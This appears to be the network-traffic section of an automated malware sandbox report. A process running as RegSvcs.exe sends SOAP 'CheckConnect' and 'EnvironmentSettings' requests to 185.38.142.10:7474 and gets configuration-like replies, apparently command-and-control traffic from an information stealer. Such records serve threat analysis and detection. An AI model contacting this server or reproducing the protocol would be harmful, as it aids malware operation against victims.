                  Jun 28, 2024 08:58:04.834958076 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834966898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834978104 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835002899 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835014105 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835021973 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835047007 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835057020 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835154057 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835164070 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835172892 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835182905 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835191965 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835201979 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835210085 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835220098 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835238934 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835247040 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835254908 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835264921 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835354090 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835362911 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835385084 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835392952 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835401058 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835411072 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835419893 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835429907 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835439920 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835448027 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835458040 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835467100 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835470915 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835474014 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835484028 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835493088 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835511923 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835520983 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835525036 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835534096 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835542917 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835551023 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835571051 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835581064 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835588932 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835598946 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835607052 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835618019 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835639000 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835649014 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835655928 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835665941 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835685968 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835695028 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835721970 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835756063 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835891008 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835901022 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835908890 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835918903 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835927963 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835937023 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835946083 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835966110 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835974932 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835983992 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.835994005 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836003065 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836021900 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836030960 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836040020 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836049080 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836087942 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836097002 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836106062 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836116076 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836123943 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836133003 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836142063 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836150885 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836169004 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836178064 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836185932 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836536884 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836548090 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836596966 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836606979 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836702108 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836711884 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836767912 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836777925 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836812019 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836822987 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836832047 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.836842060 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837203979 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837328911 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837338924 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837373972 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837383986 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837444067 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837454081 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837462902 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837508917 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837518930 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837527990 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837538958 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837558031 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837567091 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837575912 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837584972 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837594032 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837605953 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837614059 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837657928 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837667942 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837676048 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837701082 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837712049 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837729931 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837738991 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837748051 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837758064 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837766886 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837774992 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837795019 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837805033 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837811947 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837851048 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837872028 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837882042 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837892056 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.837996006 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838006020 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838080883 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838103056 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838110924 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838206053 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838216066 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838237047 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838247061 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838254929 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838300943 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838310957 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838321924 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838403940 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838414907 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838424921 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838458061 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838469982 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838507891 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838517904 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838560104 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838570118 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838578939 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838588953 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838607073 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838615894 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838624001 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838635921 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838654995 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838713884 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838723898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838732004 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838753939 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838762999 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838772058 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838782072 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838800907 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838809967 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838865042 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838874102 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838884115 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838921070 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838931084 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838989019 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.838999033 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839036942 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839046955 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839056015 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839066029 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839083910 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839092970 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839102030 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839114904 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839200974 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839253902 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839302063 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839310884 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839394093 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839402914 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839411020 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839421988 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839432001 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839519978 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839795113 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839803934 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839812040 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839890003 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839900017 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839910030 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839929104 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839939117 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839947939 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839966059 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839976072 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.839996099 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840007067 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840018034 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840096951 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840106010 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840115070 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840125084 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840145111 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840154886 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840166092 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840174913 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840186119 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840195894 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840450048 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840487003 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840708017 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840727091 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840738058 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840748072 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840756893 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840766907 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840776920 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840785027 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840795040 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840804100 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840825081 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840833902 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840842009 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840851068 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840858936 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840867996 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840877056 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840886116 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840894938 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.840900898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841012955 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841022015 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841029882 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841047049 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841056108 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841067076 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841077089 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841093063 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841100931 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841144085 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841152906 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841171980 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841181993 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841191053 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841208935 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841217995 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841226101 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841234922 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841259956 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841269970 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841278076 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841289043 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841298103 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841316938 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841325998 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841403008 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841413021 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841422081 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841430902 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841439009 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841448069 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841464043 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841473103 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841481924 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841490030 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841497898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841506004 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841515064 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841523886 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841540098 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.841547966 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.979604959 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:05.025592089 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:05.811933041 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:05.830652952 CEST497337474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:05.830734968 CEST497347474192.168.2.4185.38.142.10
                  TimestampSource PortDest PortSource IPDest IP
                  Jun 28, 2024 08:57:59.429028988 CEST6229653192.168.2.41.1.1.1
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jun 28, 2024 08:57:59.429028988 CEST192.168.2.41.1.1.10x3b7cStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jun 28, 2024 08:57:59.435825109 CEST1.1.1.1192.168.2.40x3b7cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                  • 185.38.142.10:7474
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449731185.38.142.1074741928C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  TimestampBytes transferredDirectionData
                  Jun 28, 2024 08:57:53.199131012 CEST239OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                  Host: 185.38.142.10:7474
                  Content-Length: 137
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Jun 28, 2024 08:57:53.821779013 CEST25INHTTP/1.1 100 Continue
                  Jun 28, 2024 08:57:53.958580017 CEST359INHTTP/1.1 200 OK
                  Content-Length: 212
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Fri, 28 Jun 2024 06:57:53 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                  Jun 28, 2024 08:57:59.015821934 CEST222OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                  Host: 185.38.142.10:7474
                  Content-Length: 144
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  Jun 28, 2024 08:57:59.194338083 CEST25INHTTP/1.1 100 Continue
                  Jun 28, 2024 08:57:59.387831926 CEST1236INHTTP/1.1 200 OK
                  Content-Length: 4744
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Fri, 28 Jun 2024 06:57:59 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
